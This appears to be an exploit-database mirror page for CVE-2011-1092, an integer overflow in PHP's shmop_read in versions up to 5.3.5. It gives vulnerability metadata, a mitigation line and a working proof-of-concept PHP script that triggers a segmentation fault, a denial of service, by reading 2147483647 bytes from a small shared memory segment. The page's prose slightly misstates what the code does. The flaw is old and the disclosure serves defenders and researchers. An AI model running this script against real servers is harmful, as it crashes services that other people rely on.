header-logo
Suggest Exploit
vendor:
PHP
by:
Jose Carlos Norte
7.5
CVSS
HIGH
Integer Overflow
190
CWE
Product Name: PHP
Affected Version From: <= 5.3.5
Affected Version To: <= 5.3.5
Patch Exists: YES
Related CWE: CVE-2011-1092
CPE: 2.3:a:php:php:5.3.5
Metasploit: https://www.rapid7.com/db/vulnerabilities/apple-osx-apache-cve-2011-1092/https://www.rapid7.com/db/vulnerabilities/apple-osx-php-cve-2011-1092/https://www.rapid7.com/db/vulnerabilities/suse-cve-2011-1092/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2011-1092/https://www.rapid7.com/db/vulnerabilities/php-cve-2011-1092/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu Linux
2011

PHP <=5.3.5 Integer Overflow DoS

This exploit is used to cause a denial of service (DoS) attack on a vulnerable version of PHP. The exploit uses the ftok() and shmop_open() functions to create a shared memory segment of size 2147483647 bytes. If the segment is successfully created, then the vulnerable version of PHP is confirmed.

Mitigation:

Upgrade to a version of PHP that is not vulnerable to this exploit.
Source

Exploit-DB raw data:

<?php
# Exploit Title: PHP <=5.3.5 Integer Overflow DoS
# Date: 12-03-11
# Author: Jose Carlos Norte - www.rooibo.com
# Software Link: www.php.net
# Version: <= 5.3.5
# Tested on: Ubuntu Linux
# CVE : CVE-2011-1092

$shm_key = ftok(__FILE__, 't');
$shm_id = shmop_open($shm_key, "c", 0644, 100);
$shm_data = shmop_read($shm_id, 1, 2147483647);
//if there is no segmentation fault past this point, we have 2gb of memory!
//or we are in a patched php
echo "this php version is not vulnerable!";

?>

Navigation

Suggest Exploit

Services By CQR